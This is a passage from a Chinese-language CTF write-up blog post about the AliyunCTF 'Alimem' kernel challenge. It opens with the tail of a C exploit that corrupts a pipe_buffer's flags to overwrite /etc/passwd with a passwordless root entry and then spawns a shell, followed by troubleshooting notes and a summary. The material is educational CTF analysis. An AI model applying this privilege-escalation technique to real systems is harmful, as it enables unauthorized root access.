memmem(addr, <span class="number">0x1000</span>, <span class="string">&quot;\xff\xff&quot;</span>, <span class="number">2</span>))) &#123;</span><br><span class="line">        hexdump(ptr - <span class="number">6</span>, <span class="number">0x40</span>);</span><br><span class="line">        found = <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (found) &#123;</span><br><span class="line">        <span class="class"><span class="keyword">struct</span> <span class="title">pipe_buffer</span> *<span class="title">pp</span> =</span> (<span class="keyword">struct</span> pipe_buffer *)(ptr - <span class="number">6</span>);</span><br><span class="line">        pp-&gt;len = <span class="number">0</span>;</span><br><span class="line">        pp-&gt;offset = <span class="number">0</span>;</span><br><span class="line">        pp-&gt;flags |= <span class="number">0x10</span>;</span><br><span class="line">        hexdump(ptr - <span class="number">6</span>, <span class="number">0x40</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;\n[-] UAF pipe_buffer error\n&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="type">char</span> *r00t = <span class="string">&quot;root::0:0:root:/root:/bin/sh\n&quot;</span>;</span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; PIPE_NUM; i++) &#123;</span><br><span class="line">        <span class="keyword">if</span> (write(pipe_fd[i][<span class="number">1</span>], r00t, <span class="built_in">strlen</span>(r00t)) &gt; <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="keyword">continue</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    system(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<h2 id="四-疑难问题"><a href="#四-疑难问题" class="headerlink" title="四. 疑难问题"></a>四. 疑难问题</h2><p>​	由于busybox中加入了s这个权限，所以导致直接利用cpio进行打包的时候无法重新模拟，之后因此去除了suid的权限，但是会导致后面执行完覆盖&#x2F;etc&#x2F;passwd后无法使用su命令切换成root用户。</p>
<p><img src="/images/alimem/1741173882219.jpg" alt="1741173882219"></p>
<p>​	但是可以通过cat &#x2F;etc&#x2F;passwd观察到，已经覆盖为指定内容的数据了。</p>
<p><img src="/images/alimem/1741173955066.jpg" alt="1741173955066"></p>
<p>​	多出来的回车其实是之前的root多了一个x由于这里没有覆盖之前的\n导致出现空行。</p>
<h2 id="五-总结"><a href="#五-总结" class="headerlink" title="五. 总结"></a>五. 总结</h2><p>​	通过本题的复现，我们可以清楚的掌握如何编写一个模拟内存分配的misc设备，并且如何防止多线程造成的问题（加入rcu写锁）,最后也就是如何利用splice函数实现不用泄露程序基地址就可以直接实现覆盖&#x2F;etc&#x2F;passwd，进而实现权限提升，本题难度不大，但是也掌握到了一定的漏洞利用方式。</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2026/01/25/35C3CTF-namespace/" rel="prev" title="35C3CTF-namespace">
      <i class="fa fa-chevron-left"></i> 35C3CTF-namespace
    </a></div>
      <div class="post-nav-item">
    <a href="/2026/02/07/%E9%98%BF%E9%87%8C%E4%BA%91CTF--beebee/" rel="next" title="">
       <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#AliyunCTF%E2%80%93Alimem"><span class="nav-number">1.</span> <span class="nav-text">AliyunCTF–Alimem</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%80-%E8%83%8C%E6%99%AF%E4%BB%8B%E7%BB%8D"><span class="nav-number">1.1.</span> <span class="nav-text">一. 背景介绍</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-1-splice%E5%87%BD%E6%95%B0"><span class="nav-number">1.1.1.</span> <span class="nav-text">1.1 splice函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-2-struct-page%E7%BB%93%E6%9E%84%E4%BD%93"><span class="nav-number">1.1.2.</span> <span class="nav-text">1.2 struct page结构体</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-3-vm-area-struct%E7%BB%93%E6%9E%84%E4%BD%93"><span class="nav-number">1.1.3.</span> <span class="nav-text">1.3 vm_area_struct结构体</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BA%8C-%E6%BC%8F%E6%B4%9E%E4%BA%A7%E7%94%9F%E5%8E%9F%E5%9B%A0"><span class="nav-number">1.2.</span> <span class="nav-text">二. 漏洞产生原因</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#2-1-alimem-mmap%E5%87%BD%E6%95%B0"><span class="nav-number">1.2.1.</span> <span class="nav-text">2.1 alimem_mmap函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-2-ioctl%E5%87%BD%E6%95%B0"><span class="nav-number">1.2.2.</span> <span class="nav-text">2.2 ioctl函数</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%89-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-number">1.3.</span> <span class="nav-text">三.漏洞利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#3-1-uaf%E6%9E%84%E9%80%A0"><span class="nav-number">1.3.1.</span> <span class="nav-text">3.1 uaf构造</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9B%9B-%E7%96%91%E9%9A%BE%E9%97%AE%E9%A2%98"><span class="nav-number">1.4.</span> <span class="nav-text">四. 疑难问题</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BA%94-%E6%80%BB%E7%BB%93"><span class="nav-number">1.5.</span> <span class="nav-text">五. 总结</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">a2ure</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">5</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">a2ure</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="Symbols count total">20k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="Reading time total">1:13</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
